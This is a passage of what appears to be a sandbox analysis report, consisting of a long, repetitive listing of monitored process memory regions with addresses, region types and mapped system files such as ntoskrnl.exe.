"private_0x0000000002900000" filename = "" Region: id = 7132 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7133 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7134 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7135 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7136 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7137 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7138 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7139 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7140 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7141 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7142 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7143 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7144 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7145 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7146 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7147 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7148 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7149 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7150 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7151 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7152 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7153 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7154 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7155 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7156 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7157 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7158 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7159 start_va = 0x22d0000 end_va = 0x22edfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 7160 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7161 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7162 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7163 start_va = 0x22d0000 end_va = 0x22edfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 7164 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7165 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7166 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7167 start_va = 0x22d0000 end_va = 0x22edfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 7168 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7169 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7170 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7171 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7172 start_va = 0x22d0000 end_va = 0x22edfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 7173 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7174 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7175 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7176 start_va = 0x22d0000 end_va = 0x22edfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 7177 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7178 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7179 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7180 start_va = 0x22d0000 end_va = 0x22edfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 7181 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7182 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7183 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7184 start_va = 0x22d0000 end_va = 0x22edfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 7185 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7186 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7187 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7188 start_va = 0x2290000 end_va = 0x22adfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 7189 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7190 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7191 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7192 start_va = 0x2290000 end_va = 0x22adfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 7193 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7194 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7195 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7196 start_va = 0x2290000 end_va = 0x22adfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 7197 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7198 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7199 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7200 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7201 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7202 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7203 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7205 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7206 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7207 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7208 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7209 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7210 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7211 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7212 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7213 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7214 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7215 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7216 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7217 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7218 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7219 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7220 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7221 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7222 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7223 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7224 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7225 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7226 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7227 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7228 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7229 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7230 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7231 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7232 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7234 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7235 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7236 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7237 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7238 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7239 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7240 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7241 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7242 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7243 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7244 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7245 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7246 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7247 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7248 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7249 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7250 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7251 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7252 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7253 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7254 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7255 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7256 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7257 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7258 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7259 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7260 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7261 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7262 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7263 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7264 start_va = 0x460000 end_va = 0x461fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7265 start_va = 0x2270000 end_va = 0x2291fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7266 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7267 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7268 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7269 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7270 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7271 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7272 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7273 start_va = 0x7ffd3afb0000 end_va = 0x7ffd3b063fff monitored = 0 entry_point = 0x7ffd3afc53b0 region_type = mapped_file name = "windows.internal.shell.broker.dll" filename = "\\Windows\\System32\\Windows.Internal.Shell.Broker.dll" (normalized: "c:\\windows\\system32\\windows.internal.shell.broker.dll") Region: id = 7274 start_va = 0x101d0000 end_va = 0x1024ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000101d0000" filename = "" Region: id = 7275 start_va = 0x7ff6a4680000 end_va = 0x7ff6a4e4bfff monitored = 0 entry_point = 0x7ff6a4a19010 region_type = mapped_file name = "ntoskrnl.exe" filename = "\\Windows\\System32\\ntoskrnl.exe" (normalized: "c:\\windows\\system32\\ntoskrnl.exe") Region: id = 7276 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7277 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7278 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7279 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7280 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7281 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7282 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7283 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7284 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7285 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7286 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7287 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7288 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7289 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7290 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7291 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7292 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7293 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7294 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7295 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7296 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7297 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7298 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7299 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7300 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7301 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7302 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7303 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7304 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7305 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7306 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7307 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7308 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7309 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7310 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7311 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7312 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7313 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7314 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7318 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7319 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7320 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7321 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7323 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7324 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7325 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7326 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7327 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7328 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7329 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7330 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7331 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7332 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7333 start_va = 0x400000 end_va = 